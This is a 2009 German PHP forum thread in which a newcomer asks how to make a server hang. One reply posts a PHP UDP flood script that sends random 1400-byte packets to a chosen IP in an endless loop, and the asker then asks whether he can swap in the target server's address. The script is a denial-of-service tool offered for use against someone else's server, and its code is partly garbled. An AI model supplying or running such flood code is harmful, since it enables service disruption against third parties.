PHP Forum - Coding Board
Juni 19, 2018, 11:31:38 *
Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername, Passwort und Sitzungslänge
News:
 
   Übersicht   Hilfe Suche Einloggen Registrieren  
Seiten: [1]
  Drucken  
Autor Thema: Server zum aufhängen bringen  (Gelesen 251 mal)
0 Mitglieder und 1 Gast betrachten dieses Thema.
jotter
Newbie
*
Beiträge: 21


Profil anzeigen E-Mail
« am: Juli 20, 2009, 02:57:52 »

Hi!
Gibt es mit PHP eine Möglichkeit einen Server so zu überlasten, so dass er sich aufhängt?

Oder ist es nicht möglich? Wenn nein, vielleicht mit einer anderen Programmiersprache?

MfG jotter
Gespeichert
td_armor
Super-Moderator
Haxx0r

Sr. Member
****
Beiträge: 288


Profil anzeigen E-Mail
« Antworten #1 am: Juli 20, 2009, 03:22:04 »

Gespeichert


jotter
Newbie
*
Beiträge: 21


Profil anzeigen E-Mail
« Antworten #2 am: Juli 20, 2009, 05:10:19 »

Gespeichert
Zacherl
Entwickler Team
Moderator
Sr. Member
****
Beiträge: 454



Profil anzeigen E-Mail
« Antworten #3 am: Juli 20, 2009, 05:12:41 »

Ich glaube dein Stichwort ist DDoS, bin mir aber noch nicht sicher, ob einen Server durch ein PHP Script überlasten willst, dass du auf den Server hochlädst, oder ob du wirklich ein Flood meinst.
Gespeichert

Nop0x90
Full Member
***
Beiträge: 197


541820
Profil anzeigen E-Mail
« Antworten #4 am: Juli 20, 2009, 05:49:10 »

Zitat von: Zacherl;23194
ein PHP Script überlasten willst, das du auf den Server hochlädst, oder ob du wirklich ein Flood meinst.

Das hab ich auchmal probiert, aber der server bricht nach 60 sek execution ab, aus Sicherheitsgründen.
Gespeichert

greetz Nop (ehem. Av0c4d0)
-Coding & RE


Takayuki
Full Member
***
Beiträge: 122

472082583
Profil anzeigen E-Mail
« Antworten #5 am: Juli 20, 2009, 05:50:53 »

Ich finde doch eher, wenn man keine Ahnung von der Materie hat, sollte man doch lieber die Finger davon lassen.
Mir ist es nicht bekannt nen PHP Server ausser durch DDoS zum Aufhängen zu bringen.
Gespeichert

[SIGPIC][/SIGPIC]
//ins0.!
Gast
« Antworten #6 am: Juli 20, 2009, 06:07:17 »

Ist das einzigste was in die Richtung geht, was du meinst
[HIDE]
$ip_address    =    '127.0.0.1';
$socket        =    socket_create(AF_INET,SOCK_DGRAM,SOL_UDP); 

if(!
$socket
  die(
__LINE__); 

$data=''

for (
$i=0;$i<1400;$i++) { 
    
$data.=chr(rand(0,255)); 


while(
true) { 
    
    if (!
socket_sendto($sock,$data,strlen($data),0,$ip_address,9)) 
        die(
__LINE__); 

    echo(
'-'); 

[/HIDE]
Gespeichert
jotter
Newbie
*
Beiträge: 21


Profil anzeigen E-Mail
« Antworten #7 am: Juli 20, 2009, 06:25:53 »

und bei 127.0.0.1 kann ich dann die IP von dem Server eintragen?

MfG jotter
Gespeichert
Nop0x90
Full Member
***
Beiträge: 197


541820
Profil anzeigen E-Mail
« Antworten #8 am: Juli 20, 2009, 06:45:22 »

Zitat von: jotter;23217
und bei 127.0.0.1 kann ich dann die IP von dem Server eintragen?

MfG jotter
Gespeichert

greetz Nop (ehem. Av0c4d0)
-Coding & RE


Paran0id
Hero Member
*****
Beiträge: 662


473716 Paran0id@FBI.gov
Profil anzeigen WWW E-Mail
« Antworten #9 am: Juli 20, 2009, 06:48:20 »

Mehr wie den Webserver wirste damit nicht zum Absturz bringen...
Gespeichert

Sie gehen auf ihren kommandierenden
Offizier zu, setzen ihm die Waffe an
den Kopf und blasen ihm das Gehirn raus.
//ins0.!
Gast
« Antworten #10 am: Juli 20, 2009, 06:52:12 »

was will man auch mehr von dem script erwarten L&#228;chelnd
Gespeichert
Seiten: [1]
  Drucken  
 
Gehe zu:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.21 | SMF © 2006-2009, Simple Machines | New Look by Nolt Prüfe XHTML 1.0 Prüfe CSS